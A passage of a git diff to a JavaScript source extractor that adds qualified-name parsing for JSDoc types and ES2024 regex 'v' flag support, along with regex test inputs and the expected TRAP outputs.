isSpeculativeParsing, String flags) { + Result res = parser.parse(src, flags); if (isSpeculativeParsing && res.getErrors().size() > 0) { return; } @@ -364,4 +392,8 @@ public void extract(String src, SourceMap sourceMap, Node parent, boolean isSpec this.emitLocation(err, lbl); } } + + public void extract(String src, SourceMap sourceMap, Node parent, boolean isSpeculativeParsing) { + extract(src, sourceMap, parent, isSpeculativeParsing, ""); + } } diff --git a/javascript/extractor/src/com/semmle/js/parser/JSDocParser.java b/javascript/extractor/src/com/semmle/js/parser/JSDocParser.java index 391f703d2b07..f1b13565191e 100644 --- a/javascript/extractor/src/com/semmle/js/parser/JSDocParser.java +++ b/javascript/extractor/src/com/semmle/js/parser/JSDocParser.java @@ -10,13 +10,14 @@ import com.semmle.js.ast.jsdoc.JSDocComment; import com.semmle.js.ast.jsdoc.JSDocTag; import com.semmle.js.ast.jsdoc.JSDocTypeExpression; -import com.semmle.js.ast.jsdoc.NameExpression; +import com.semmle.js.ast.jsdoc.Identifier; import com.semmle.js.ast.jsdoc.NonNullableType; import com.semmle.js.ast.jsdoc.NullLiteral; import com.semmle.js.ast.jsdoc.NullableLiteral; import com.semmle.js.ast.jsdoc.NullableType; import com.semmle.js.ast.jsdoc.OptionalType; import com.semmle.js.ast.jsdoc.ParameterType; +import com.semmle.js.ast.jsdoc.QualifiedNameExpression; import com.semmle.js.ast.jsdoc.RecordType; import com.semmle.js.ast.jsdoc.RestType; import com.semmle.js.ast.jsdoc.TypeApplication; @@ -70,30 +71,6 @@ public JSDocComment parse(Comment comment) { return new JSDocComment(comment, r.fst(), tags); } - /** Specification of Doctrine AST types for JSDoc type expressions. */ - private static final Map, List> spec = - new LinkedHashMap, List>(); - - static { - spec.put(AllLiteral.class, Arrays.asList()); - spec.put(ArrayType.class, Arrays.asList("elements")); - spec.put(FieldType.class, Arrays.asList("key", "value")); - spec.put(FunctionType.class, Arrays.asList("this", "new", "params", "result")); - spec.put(NameExpression.class, Arrays.asList("name")); - spec.put(NonNullableType.class, Arrays.asList("expression", "prefix")); - spec.put(NullableLiteral.class, Arrays.asList()); - spec.put(NullLiteral.class, Arrays.asList()); - spec.put(NullableType.class, Arrays.asList("expression", "prefix")); - spec.put(OptionalType.class, Arrays.asList("expression")); - spec.put(ParameterType.class, Arrays.asList("name", "expression")); - spec.put(RecordType.class, Arrays.asList("fields")); - spec.put(RestType.class, Arrays.asList("expression")); - spec.put(TypeApplication.class, Arrays.asList("expression", "applications")); - spec.put(UndefinedLiteral.class, Arrays.asList()); - spec.put(UnionType.class, Arrays.asList("elements")); - spec.put(VoidLiteral.class, Arrays.asList()); - } - private static String sliceSource(String source, int index, int last) { if (index >= source.length()) return ""; if (last > source.length()) last = source.length(); @@ -137,7 +114,7 @@ private static boolean isIdentifierPart(char ch) { } private static boolean isTypeName(char ch) { - return "><(){}[],:*|?!=".indexOf(ch) == -1 && !isWhiteSpace(ch) && !isLineTerminator(ch); + return "><(){}[],:*|?!=.".indexOf(ch) == -1 && !isWhiteSpace(ch) && !isLineTerminator(ch); } private static boolean isParamTitle(String title) { @@ -559,21 +536,12 @@ private Token scanNumber() throws ParseError { } private Token scanTypeName() { - char ch, ch2; - - value = new String(Character.toChars(advance())); + StringBuilder sb = new StringBuilder(); + sb.append((char)advance()); while (index < endIndex && isTypeName(source.charAt(index))) { - ch = source.charAt(index); - if (ch == '.') { - if ((index + 1) < endIndex) { - ch2 = source.charAt(index + 1); - if (ch2 == '<') { - break; - } - } - } - value += new String(Character.toChars(advance())); + sb.append((char)advance()); } + value = sb.toString(); return Token.NAME; } @@ -848,11 +816,24 @@ private JSDocTypeExpression parseRecordType() throws ParseError { return finishNode(new RecordType(loc, fields)); } - private JSDocTypeExpression parseNameExpression() throws ParseError { - Object name = value; + private Identifier parseIdentifier() throws ParseError { SourceLocation loc = loc(); + Object value = this.value; // save the value of the current token expect(Token.NAME); - return finishNode(new NameExpression(loc, name.toString())); + return finishNode(new Identifier(loc, value.toString())); + } + + private JSDocTypeExpression parseNameExpression() throws ParseError { + JSDocTypeExpression node = parseIdentifier(); + while (token == Token.DOT) { + consume(Token.DOT); + Identifier memberName = parseIdentifier(); + // Create a SourceLocation object with the correct start location. + // The call to finishNode() will set the end location. + SourceLocation loc = new SourceLocation(node.getLoc()); + node = finishNode(new QualifiedNameExpression(loc, node, memberName)); + } + return node; } // TypeExpressionList := @@ -945,14 +926,14 @@ private List parseParametersType() throws ParseError { SourceLocation loc = loc(); expr = parseTypeExpression(); - if (expr instanceof NameExpression && token == Token.COLON) { + if (expr instanceof Identifier && token == Token.COLON) { // Identifier ':' TypeExpression consume(Token.COLON); expr = finishNode( new ParameterType( new SourceLocation(loc), - ((NameExpression) expr).getName(), + ((Identifier) expr).getName(), parseTypeExpression())); } if (token == Token.EQUAL) { @@ -1128,7 +1109,7 @@ private JSDocTypeExpression parseTypeExpression() throws ParseError { consume(Token.RBRACK, "expected an array-style type declaration (' + value + '[])"); List expressions = new ArrayList<>(); expressions.add(expr); - NameExpression nameExpr = finishNode(new NameExpression(new SourceLocation(loc), "Array")); + Identifier nameExpr = finishNode(new Identifier(new SourceLocation(loc), "Array")); return finishNode(new TypeApplication(loc, nameExpr, expressions)); } @@ -1549,9 +1530,9 @@ public boolean parseName() { // fixed at the end if (isParamTitle(this._title) && this._tag.type != null - && this._tag.type instanceof NameExpression) { - this._extra_name = ((NameExpression) this._tag.type).getName(); - this._tag.name = ((NameExpression) this._tag.type).getName(); + && this._tag.type instanceof Identifier) { + this._extra_name = ((Identifier) this._tag.type).getName(); + this._tag.name = ((Identifier) this._tag.type).getName(); this._tag.type = null; } else { if (!this.addError("Missing or invalid tag name")) { @@ -1667,7 +1648,7 @@ private boolean epilogue() { Position start = new Position(_tag.startLine, _tag.startColumn, _tag.startColumn); Position end = new Position(_tag.startLine, _tag.startColumn, _tag.startColumn); SourceLocation loc = new SourceLocation(_extra_name, start, end); - this._tag.type = new NameExpression(loc, _extra_name); + this._tag.type = new Identifier(loc, _extra_name); } this._tag.name = null; diff --git a/javascript/extractor/src/com/semmle/js/parser/RegExpParser.java b/javascript/extractor/src/com/semmle/js/parser/RegExpParser.java index 5b2177f3fffa..9a489268b18c 100644 --- a/javascript/extractor/src/com/semmle/js/parser/RegExpParser.java +++ b/javascript/extractor/src/com/semmle/js/parser/RegExpParser.java @@ -6,7 +6,9 @@ import com.semmle.js.ast.regexp.Caret; import com.semmle.js.ast.regexp.CharacterClass; import com.semmle.js.ast.regexp.CharacterClassEscape; +import com.semmle.js.ast.regexp.CharacterClassQuotedString; import com.semmle.js.ast.regexp.CharacterClassRange; +import com.semmle.js.ast.regexp.CharacterClassSubtraction; import com.semmle.js.ast.regexp.Constant; import com.semmle.js.ast.regexp.ControlEscape; import com.semmle.js.ast.regexp.ControlLetter; @@ -18,6 +20,7 @@ import com.semmle.js.ast.regexp.Group; import com.semmle.js.ast.regexp.HexEscapeSequence; import com.semmle.js.ast.regexp.IdentityEscape; +import com.semmle.js.ast.regexp.CharacterClassIntersection; import com.semmle.js.ast.regexp.NamedBackReference; import com.semmle.js.ast.regexp.NonWordBoundary; import com.semmle.js.ast.regexp.OctalEscape; @@ -36,6 +39,7 @@ import com.semmle.js.ast.regexp.ZeroWidthPositiveLookbehind; import java.util.ArrayList; import java.util.Arrays; +import java.util.Collections; import java.util.List; /** A parser for ECMAScript 2018 regular expressions. */ @@ -67,6 +71,8 @@ public List getErrors() { private List errors; private List backrefs; private int maxbackref; + private boolean vFlagEnabled = false; + private boolean uFlagEnabled = false; /** Parse the given string as a regular expression. */ public Result parse(String src) { @@ -82,6 +88,12 @@ public Result parse(String src) { return new Result(root, errors); } + public Result parse(String src, String flags) { + vFlagEnabled = flags != null && flags.contains("v"); + uFlagEnabled = flags != null && flags.contains("u"); + return parse(src); + } + private static String fromCodePoint(int codepoint) { if (Character.isValidCodePoint(codepoint)) return new String(Character.toChars(codepoint)); // replacement character @@ -277,6 +289,43 @@ private RegExpTerm parseTerm() { return this.finishTerm(this.parseQuantifierOpt(loc, this.parseAtom())); } + private RegExpTerm parseDisjunctionInsideQuotedString() { + SourceLocation loc = new SourceLocation(pos()); + List disjuncts = new ArrayList<>(); + disjuncts.add(this.parseAlternativeInsideQuotedString()); + while (this.match("|")) { + disjuncts.add(this.parseAlternativeInsideQuotedString()); + } + if (disjuncts.size() == 1) return disjuncts.get(0); + return this.finishTerm(new Disjunction(loc, disjuncts)); + } + + private RegExpTerm parseAlternativeInsideQuotedString() { + SourceLocation loc = new SourceLocation(pos()); + int startPos = this.pos; + boolean escaped = false; + while (true) { + // If we're at the end of the string, something went wrong. + if (this.atEOS()) { + this.error(Error.UNEXPECTED_EOS); + break; + } + // We can end parsing if we're not escaped and we see a `|` which would mean Alternation + // or `}` which would mean the end of the Quoted String. + if(!escaped && this.lookahead(null, "|", "}")){ + break; + } + char c = this.nextChar(); + // Track whether the character is an escape character. + escaped = !escaped && (c == '\\'); + } + String literal = src.substring(startPos, pos); + loc.setEnd(pos()); + loc.setSource(literal); + + return new Constant(loc, literal); + } + private RegExpTerm parseQuantifierOpt(SourceLocation loc, RegExpTerm atom) { if (this.match("*")) return this.finishTerm(new Star(loc, atom, !this.match("?"))); if (this.match("+")) return this.finishTerm(new Plus(loc, atom, !this.match("?"))); @@ -421,7 +470,13 @@ private RegExpTerm parseAtomEscape(SourceLocation loc, boolean inCharClass) { return this.finishTerm(new NamedBackReference(loc, name, "\\k<" + name + ">")); } - if (this.match("p{", "P{")) { + if (vFlagEnabled && this.match("q{")) { + RegExpTerm term = parseDisjunctionInsideQuotedString(); + this.expectRBrace(); + return this.finishTerm(new CharacterClassQuotedString(loc, term)); + } + + if ((vFlagEnabled || uFlagEnabled) && this.match("p{", "P{")) { String name = this.readIdentifier(); if (this.match("=")) { value = this.readIdentifier(); @@ -493,6 +548,7 @@ private RegExpTerm parseAtomEscape(SourceLocation loc, boolean inCharClass) { } private RegExpTerm parseCharacterClass() { + if (vFlagEnabled) return parseNestedCharacterClass(); SourceLocation loc = new SourceLocation(pos()); List elements = new ArrayList<>(); @@ -508,6 +564,43 @@ private RegExpTerm parseCharacterClass() { return this.finishTerm(new CharacterClass(loc, elements, inverted)); } + private enum CharacterClassType { + STANDARD, + INTERSECTION, + SUBTRACTION + } + + // ECMA 2024 `v` flag allows nested character classes. + private RegExpTerm parseNestedCharacterClass() { + SourceLocation loc = new SourceLocation(pos()); + List elements = new ArrayList<>(); + CharacterClassType classType = CharacterClassType.STANDARD; + + this.match("["); + boolean inverted = this.match("^"); + while (!this.match("]")) { + if (this.atEOS()) { + this.error(Error.EXPECTED_RBRACKET); + break; + } + if (lookahead("[")) elements.add(parseNestedCharacterClass()); + else if (this.match("&&")) classType = CharacterClassType.INTERSECTION; + else if (this.match("--")) classType = CharacterClassType.SUBTRACTION; + else elements.add(this.parseCharacterClassElement()); + } + + // Create appropriate RegExpTerm based on the detected class type + switch (classType) { + case INTERSECTION: + return this.finishTerm(new CharacterClass(loc, Collections.singletonList(new CharacterClassIntersection(loc, elements)), inverted)); + case SUBTRACTION: + return this.finishTerm(new CharacterClass(loc, Collections.singletonList(new CharacterClassSubtraction(loc, elements)), inverted)); + case STANDARD: + default: + return this.finishTerm(new CharacterClass(loc, elements, inverted)); + } + } + private static final List escapeClasses = Arrays.asList("d", "D", "s", "S", "w", "W"); private RegExpTerm parseCharacterClassElement() { @@ -519,7 +612,7 @@ private RegExpTerm parseCharacterClassElement() { return atom; } } - if (!this.lookahead("-]") && this.match("-") && !(atom instanceof CharacterClassEscape)) + if (!this.lookahead("-]") && !this.lookahead("--") && this.match("-") && !(atom instanceof CharacterClassEscape)) return this.finishTerm(new CharacterClassRange(loc, atom, this.parseCharacterClassAtom())); return atom; } diff --git a/javascript/extractor/src/com/semmle/ts/ast/ITypeExpression.java b/javascript/extractor/src/com/semmle/ts/ast/ITypeExpression.java index 71185a7f92c5..4372eba125f8 100644 --- a/javascript/extractor/src/com/semmle/ts/ast/ITypeExpression.java +++ b/javascript/extractor/src/com/semmle/ts/ast/ITypeExpression.java @@ -10,4 +10,6 @@ * however, some expressions such as {@link Literal} type may occur in a type annotation because the * TypeScript AST does not distinguish null literals from the null type. */ -public interface ITypeExpression extends INode, ITypedAstNode {} +public interface ITypeExpression extends INode, ITypedAstNode { + public default boolean isValidTypeExpression() { return true; } +} diff --git a/javascript/extractor/src/com/semmle/ts/extractor/TypeScriptASTConverter.java b/javascript/extractor/src/com/semmle/ts/extractor/TypeScriptASTConverter.java index dfc15e4e4aa1..a3e031845a2a 100644 --- a/javascript/extractor/src/com/semmle/ts/extractor/TypeScriptASTConverter.java +++ b/javascript/extractor/src/com/semmle/ts/extractor/TypeScriptASTConverter.java @@ -1907,7 +1907,7 @@ private Node convertOptionalType(JsonObject node, SourceLocation loc) throws Par } private ITypeExpression asType(Node node) { - return node instanceof ITypeExpression ? (ITypeExpression) node : null; + return node instanceof ITypeExpression && ((ITypeExpression)node).isValidTypeExpression() ? (ITypeExpression) node : null; } private List convertChildrenAsTypes(JsonObject node, String child) diff --git a/javascript/extractor/tests/comments/output/trap/jsdoc.js.trap b/javascript/extractor/tests/comments/output/trap/jsdoc.js.trap index 736a6b2d19ff..910c567993f3 100644 --- a/javascript/extractor/tests/comments/output/trap/jsdoc.js.trap +++ b/javascript/extractor/tests/comments/output/trap/jsdoc.js.trap @@ -517,150 +517,170 @@ jsdoc_type_exprs(#20157,4,#20145,-1,"void") locations_default(#20158,#10000,11,60,11,63) hasLocation(#20157,#20158) #20159=* -jsdoc_type_exprs(#20159,5,#20145,-2,"goog.ui.Menu") +jsdoc_type_exprs(#20159,15,#20145,-2,"goog.ui.Menu") #20160=@"loc,{#10000},11,26,11,37" locations_default(#20160,#10000,11,26,11,37) hasLocation(#20159,#20160) -jsdoc_has_new_parameter(#20145) #20161=* -jsdoc_tags(#20161,"param",#20117,4,"@param") -#20162=@"loc,{#10000},12,5,12,10" -locations_default(#20162,#10000,12,5,12,10) +jsdoc_type_exprs(#20161,15,#20159,0,"goog.ui") +#20162=@"loc,{#10000},11,26,11,32" +locations_default(#20162,#10000,11,26,11,32) hasLocation(#20161,#20162) -jsdoc_tag_names(#20161,"var_args") #20163=* -jsdoc_type_exprs(#20163,14,#20161,0,"...number") -#20164=@"loc,{#10000},12,13,12,21" -locations_default(#20164,#10000,12,13,12,21) +jsdoc_type_exprs(#20163,5,#20161,0,"goog") +#20164=@"loc,{#10000},11,26,11,29" +locations_default(#20164,#10000,11,26,11,29) hasLocation(#20163,#20164) #20165=* -jsdoc_type_exprs(#20165,5,#20163,0,"number") -#20166=@"loc,{#10000},12,16,12,21" -locations_default(#20166,#10000,12,16,12,21) +jsdoc_type_exprs(#20165,5,#20161,1,"ui") +#20166=@"loc,{#10000},11,31,11,32" +locations_default(#20166,#10000,11,31,11,32) hasLocation(#20165,#20166) #20167=* -jsdoc(#20167,"",#20010) -hasLocation(#20167,#20011) -#20168=* -jsdoc_tags(#20168,"param",#20167,0,"@param") -#20169=@"loc,{#10000},15,4,15,9" -locations_default(#20169,#10000,15,4,15,9) -hasLocation(#20168,#20169) -#20170=* -jsdoc_errors(#20170,#20168,"Missing or invalid tag name","Missing ... ag name") +jsdoc_type_exprs(#20167,5,#20159,1,"Menu") +#20168=@"loc,{#10000},11,34,11,37" +locations_default(#20168,#10000,11,34,11,37) +hasLocation(#20167,#20168) +jsdoc_has_new_parameter(#20145) +#20169=* +jsdoc_tags(#20169,"param",#20117,4,"@param") +#20170=@"loc,{#10000},12,5,12,10" +locations_default(#20170,#10000,12,5,12,10) +hasLocation(#20169,#20170) +jsdoc_tag_names(#20169,"var_args") #20171=* -jsdoc_tags(#20171,"param",#20167,1,"@param") -#20172=@"loc,{#10000},16,4,16,9" -locations_default(#20172,#10000,16,4,16,9) +jsdoc_type_exprs(#20171,14,#20169,0,"...number") +#20172=@"loc,{#10000},12,13,12,21" +locations_default(#20172,#10000,12,13,12,21) hasLocation(#20171,#20172) -jsdoc_tag_names(#20171,"x") #20173=* -jsdoc(#20173,"",#20012) -hasLocation(#20173,#20013) -#20174=* -jsdoc_tags(#20174,"",#20173,0,"@") -#20175=@"loc,{#10000},20,4,20,4" -locations_default(#20175,#10000,20,4,20,4) -hasLocation(#20174,#20175) -jsdoc_tag_descriptions(#20174,"{link a}") +jsdoc_type_exprs(#20173,5,#20171,0,"number") +#20174=@"loc,{#10000},12,16,12,21" +locations_default(#20174,#10000,12,16,12,21) +hasLocation(#20173,#20174) +#20175=* +jsdoc(#20175,"",#20010) +hasLocation(#20175,#20011) #20176=* -jsdoc_errors(#20176,#20174,"Missing or invalid title","Missing ... d title") -#20177=* -jsdoc(#20177,"",#20014) -hasLocation(#20177,#20015) +jsdoc_tags(#20176,"param",#20175,0,"@param") +#20177=@"loc,{#10000},15,4,15,9" +locations_default(#20177,#10000,15,4,15,9) +hasLocation(#20176,#20177) #20178=* -jsdoc_tags(#20178,"typedef",#20177,0,"@typedef") -#20179=@"loc,{#10000},24,4,24,11" -locations_default(#20179,#10000,24,4,24,11) -hasLocation(#20178,#20179) -jsdoc_tag_descriptions(#20178,"{a}") -#20180=* -jsdoc_errors(#20180,#20178,"Missing or invalid tag type","Missing ... ag type") +jsdoc_errors(#20178,#20176,"Missing or invalid tag name","Missing ... ag name") +#20179=* +jsdoc_tags(#20179,"param",#20175,1,"@param") +#20180=@"loc,{#10000},16,4,16,9" +locations_default(#20180,#10000,16,4,16,9) +hasLocation(#20179,#20180) +jsdoc_tag_names(#20179,"x") #20181=* -jsdoc(#20181,"[resize description]",#20016) -hasLocation(#20181,#20017) +jsdoc(#20181,"",#20012) +hasLocation(#20181,#20013) #20182=* -jsdoc_tags(#20182,"param",#20181,0,"@param") -#20183=@"loc,{#10000},30,4,30,9" -locations_default(#20183,#10000,30,4,30,9) +jsdoc_tags(#20182,"",#20181,0,"@") +#20183=@"loc,{#10000},20,4,20,4" +locations_default(#20183,#10000,20,4,20,4) hasLocation(#20182,#20183) -jsdoc_tag_descriptions(#20182,"[description] -") -jsdoc_tag_names(#20182,"w") +jsdoc_tag_descriptions(#20182,"{link a}") #20184=* -jsdoc_type_exprs(#20184,10,#20182,0,"[type]") -#20185=@"loc,{#10000},30,13,30,18" -locations_default(#20185,#10000,30,13,30,18) -hasLocation(#20184,#20185) +jsdoc_errors(#20184,#20182,"Missing or invalid title","Missing ... d title") +#20185=* +jsdoc(#20185,"",#20014) +hasLocation(#20185,#20015) #20186=* -jsdoc_type_exprs(#20186,5,#20184,0,"type") -#20187=@"loc,{#10000},30,14,30,17" -locations_default(#20187,#10000,30,14,30,17) +jsdoc_tags(#20186,"typedef",#20185,0,"@typedef") +#20187=@"loc,{#10000},24,4,24,11" +locations_default(#20187,#10000,24,4,24,11) hasLocation(#20186,#20187) +jsdoc_tag_descriptions(#20186,"{a}") #20188=* -jsdoc_tags(#20188,"param",#20181,1,"@param") -#20189=@"loc,{#10000},31,4,31,9" -locations_default(#20189,#10000,31,4,31,9) -hasLocation(#20188,#20189) -jsdoc_tag_descriptions(#20188,"[description] -") +jsdoc_errors(#20188,#20186,"Missing or invalid tag type","Missing ... ag type") +#20189=* +jsdoc(#20189,"[resize description]",#20016) +hasLocation(#20189,#20017) #20190=* -jsdoc_tags(#20190,"return",#20181,2,"@return") -#20191=@"loc,{#10000},32,4,32,10" -locations_default(#20191,#10000,32,4,32,10) +jsdoc_tags(#20190,"param",#20189,0,"@param") +#20191=@"loc,{#10000},30,4,30,9" +locations_default(#20191,#10000,30,4,30,9) hasLocation(#20190,#20191) -jsdoc_tag_descriptions(#20190,"[description]") +jsdoc_tag_descriptions(#20190,"[description] +") +jsdoc_tag_names(#20190,"w") #20192=* jsdoc_type_exprs(#20192,10,#20190,0,"[type]") -#20193=@"loc,{#10000},32,13,32,18" -locations_default(#20193,#10000,32,13,32,18) +#20193=@"loc,{#10000},30,13,30,18" +locations_default(#20193,#10000,30,13,30,18) hasLocation(#20192,#20193) #20194=* jsdoc_type_exprs(#20194,5,#20192,0,"type") -#20195=@"loc,{#10000},32,14,32,17" -locations_default(#20195,#10000,32,14,32,17) +#20195=@"loc,{#10000},30,14,30,17" +locations_default(#20195,#10000,30,14,30,17) hasLocation(#20194,#20195) #20196=* -jsdoc(#20196,"",#20018) -hasLocation(#20196,#20019) -#20197=* -jsdoc_tags(#20197,"exports",#20196,0,"@exports") -#20198=@"loc,{#10000},36,3,36,10" -locations_default(#20198,#10000,36,3,36,10) -hasLocation(#20197,#20198) -jsdoc_tag_descriptions(#20197,"R -") -#20199=* -jsdoc(#20199,"",#20020) -hasLocation(#20199,#20021) +jsdoc_tags(#20196,"param",#20189,1,"@param") +#20197=@"loc,{#10000},31,4,31,9" +locations_default(#20197,#10000,31,4,31,9) +hasLocation(#20196,#20197) +jsdoc_tag_descriptions(#20196,"[description] +") +#20198=* +jsdoc_tags(#20198,"return",#20189,2,"@return") +#20199=@"loc,{#10000},32,4,32,10" +locations_default(#20199,#10000,32,4,32,10) +hasLocation(#20198,#20199) +jsdoc_tag_descriptions(#20198,"[description]") #20200=* -jsdoc_tags(#20200,"typedef",#20199,0,"@typedef") -#20201=@"loc,{#10000},41,4,41,11" -locations_default(#20201,#10000,41,4,41,11) +jsdoc_type_exprs(#20200,10,#20198,0,"[type]") +#20201=@"loc,{#10000},32,13,32,18" +locations_default(#20201,#10000,32,13,32,18) hasLocation(#20200,#20201) #20202=* -jsdoc_type_exprs(#20202,9,#20200,0,"{0: number}") -#20203=@"loc,{#10000},41,14,41,24" -locations_default(#20203,#10000,41,14,41,24) +jsdoc_type_exprs(#20202,5,#20200,0,"type") +#20203=@"loc,{#10000},32,14,32,17" +locations_default(#20203,#10000,32,14,32,17) hasLocation(#20202,#20203) -jsdoc_record_field_name(#20202,0,"0") #20204=* -jsdoc_type_exprs(#20204,5,#20202,0,"number") -#20205=@"loc,{#10000},41,18,41,23" -locations_default(#20205,#10000,41,18,41,23) -hasLocation(#20204,#20205) -toplevels(#20001,0) -#20206=@"loc,{#10000},1,1,43,0" -locations_default(#20206,#10000,1,1,43,0) -hasLocation(#20001,#20206) +jsdoc(#20204,"",#20018) +hasLocation(#20204,#20019) +#20205=* +jsdoc_tags(#20205,"exports",#20204,0,"@exports") +#20206=@"loc,{#10000},36,3,36,10" +locations_default(#20206,#10000,36,3,36,10) +hasLocation(#20205,#20206) +jsdoc_tag_descriptions(#20205,"R +") #20207=* -entry_cfg_node(#20207,#20001) -#20208=@"loc,{#10000},1,1,1,0" -locations_default(#20208,#10000,1,1,1,0) -hasLocation(#20207,#20208) -#20209=* -exit_cfg_node(#20209,#20001) -hasLocation(#20209,#20105) -successor(#20207,#20209) +jsdoc(#20207,"",#20020) +hasLocation(#20207,#20021) +#20208=* +jsdoc_tags(#20208,"typedef",#20207,0,"@typedef") +#20209=@"loc,{#10000},41,4,41,11" +locations_default(#20209,#10000,41,4,41,11) +hasLocation(#20208,#20209) +#20210=* +jsdoc_type_exprs(#20210,9,#20208,0,"{0: number}") +#20211=@"loc,{#10000},41,14,41,24" +locations_default(#20211,#10000,41,14,41,24) +hasLocation(#20210,#20211) +jsdoc_record_field_name(#20210,0,"0") +#20212=* +jsdoc_type_exprs(#20212,5,#20210,0,"number") +#20213=@"loc,{#10000},41,18,41,23" +locations_default(#20213,#10000,41,18,41,23) +hasLocation(#20212,#20213) +toplevels(#20001,0) +#20214=@"loc,{#10000},1,1,43,0" +locations_default(#20214,#10000,1,1,43,0) +hasLocation(#20001,#20214) +#20215=* +entry_cfg_node(#20215,#20001) +#20216=@"loc,{#10000},1,1,1,0" +locations_default(#20216,#10000,1,1,1,0) +hasLocation(#20215,#20216) +#20217=* +exit_cfg_node(#20217,#20001) +hasLocation(#20217,#20105) +successor(#20215,#20217) numlines(#10000,42,0,37) filetype(#10000,"javascript") diff --git a/javascript/extractor/tests/es2024/input/additional_test_cases.js b/javascript/extractor/tests/es2024/input/additional_test_cases.js new file mode 100644 index 000000000000..718805993315 --- /dev/null +++ b/javascript/extractor/tests/es2024/input/additional_test_cases.js @@ -0,0 +1,2 @@ +/^p(ost)?[ |\.]*o(ffice)?[ |\.]*(box)?[ 0-9]*[^[a-z ]]*/g; +/([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/; diff --git a/javascript/extractor/tests/es2024/input/intersection.js b/javascript/extractor/tests/es2024/input/intersection.js new file mode 100644 index 000000000000..a1f50cbaef6d --- /dev/null +++ b/javascript/extractor/tests/es2024/input/intersection.js @@ -0,0 +1,7 @@ +/[[abc]&&[bcd]]/v; // Valid use of intersection operator, matches b or c +/abc&&bcd/v; //Valid regex, but no intersection operation: Matches the literal string "abc&&bcd" +/[abc]&&[bcd]/v; // Valid regex, but incorrect intersection operation: + // - Matches a single character from [abc] + // - Then the literal "&&" + // - Then a single character from [bcd] +/[[abc]&&[bcd]&&[c]]/v; // Valid use of intersection operator, matches c diff --git a/javascript/extractor/tests/es2024/input/regex_nested_character_class.js b/javascript/extractor/tests/es2024/input/regex_nested_character_class.js new file mode 100644 index 000000000000..8326d338f54f --- /dev/null +++ b/javascript/extractor/tests/es2024/input/regex_nested_character_class.js @@ -0,0 +1,3 @@ +/[[]]/v; //Previously not allowed to nest character classes now completely valid with v flag. +/[[a]]/v; +/[ [] [ [] [] ] ]/v; diff --git a/javascript/extractor/tests/es2024/input/regex_quoted_string.js b/javascript/extractor/tests/es2024/input/regex_quoted_string.js new file mode 100644 index 000000000000..2749af7f9d09 --- /dev/null +++ b/javascript/extractor/tests/es2024/input/regex_quoted_string.js @@ -0,0 +1,5 @@ +/[\q{abc}]/v; +/[\q{abc|cbd|dcb}]/v; +/[\q{\}}]/v; +/[\q{\{}]/v; +/[\q{cc|\}a|cc}]/v; diff --git a/javascript/extractor/tests/es2024/input/subtraction.js b/javascript/extractor/tests/es2024/input/subtraction.js new file mode 100644 index 000000000000..918375fb911c --- /dev/null +++ b/javascript/extractor/tests/es2024/input/subtraction.js @@ -0,0 +1,3 @@ +/[\p{Script_Extensions=Greek}--\p{Letter}]/v; +/[[abc]--[cbd]]/v; +/[[abc]--[cbd]--[bde]]/v; diff --git a/javascript/extractor/tests/es2024/input/test.js b/javascript/extractor/tests/es2024/input/test.js new file mode 100644 index 000000000000..1f96a35e4c21 --- /dev/null +++ b/javascript/extractor/tests/es2024/input/test.js @@ -0,0 +1 @@ +const regex = /\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)/gmv; diff --git a/javascript/extractor/tests/es2024/input/union.js b/javascript/extractor/tests/es2024/input/union.js new file mode 100644 index 000000000000..9eeab43f43aa --- /dev/null +++ b/javascript/extractor/tests/es2024/input/union.js @@ -0,0 +1,6 @@ +/[\p{Script_Extensions=Greek}\p{RGI_Emoji}]/v; +/[[abc][cbd]]/v; +/[\p{Emoji}\q{a&}byz]/v; +/[\q{\\\}a&}byz]/v; +/[\q{\\}]/v; +/[\q{abc|cbd|\}}]/v; diff --git a/javascript/extractor/tests/es2024/options.json b/javascript/extractor/tests/es2024/options.json new file mode 100644 index 000000000000..075583ca1f63 --- /dev/null +++ b/javascript/extractor/tests/es2024/options.json @@ -0,0 +1,3 @@ +{ + "experimental": true +} diff --git a/javascript/extractor/tests/es2024/output/trap/additional_test_cases.js.trap b/javascript/extractor/tests/es2024/output/trap/additional_test_cases.js.trap new file mode 100644 index 000000000000..bd2318dbc5c4 --- /dev/null +++ b/javascript/extractor/tests/es2024/output/trap/additional_test_cases.js.trap @@ -0,0 +1,546 @@ +#10000=@"/additional_test_cases.js;sourcefile" +files(#10000,"/additional_test_cases.js") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=@"global_scope" +scopes(#20000,0) +#20001=@"script;{#10000},1,1" +#20002=* +lines(#20002,#20001,"/^p(ost)?[ |\.]*o(ffice)?[ |\.]*(box)?[ 0-9]*[^[a-z ]]*/g;"," +") +#20003=@"loc,{#10000},1,1,1,58" +locations_default(#20003,#10000,1,1,1,58) +hasLocation(#20002,#20003) +#20004=* +lines(#20004,#20001,"/([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/;"," +") +#20005=@"loc,{#10000},2,1,2,47" +locations_default(#20005,#10000,2,1,2,47) +hasLocation(#20004,#20005) +numlines(#20001,2,2,0) +#20006=* +tokeninfo(#20006,5,#20001,0,"/^p(ost)?[ |\.]*o(ffice)?[ |\.]*(box)?[ 0-9]*[^[a-z ]]*/g") +#20007=@"loc,{#10000},1,1,1,57" +locations_default(#20007,#10000,1,1,1,57) +hasLocation(#20006,#20007) +#20008=* +tokeninfo(#20008,8,#20001,1,";") +#20009=@"loc,{#10000},1,58,1,58" +locations_default(#20009,#10000,1,58,1,58) +hasLocation(#20008,#20009) +#20010=* +tokeninfo(#20010,5,#20001,2,"/([ ]*[a-z0-9&#*=?@\\><:,()$[\]_.{}!+%^-]+)+X/") +#20011=@"loc,{#10000},2,1,2,46" +locations_default(#20011,#10000,2,1,2,46) +hasLocation(#20010,#20011) +#20012=* +tokeninfo(#20012,8,#20001,3,";") +#20013=@"loc,{#10000},2,47,2,47" +locations_default(#20013,#10000,2,47,2,47) +hasLocation(#20012,#20013) +#20014=* +tokeninfo(#20014,0,#20001,4,"") +#20015=@"loc,{#10000},3,1,3,0" +locations_default(#20015,#10000,3,1,3,0) +hasLocation(#20014,#20015) +toplevels(#20001,0) 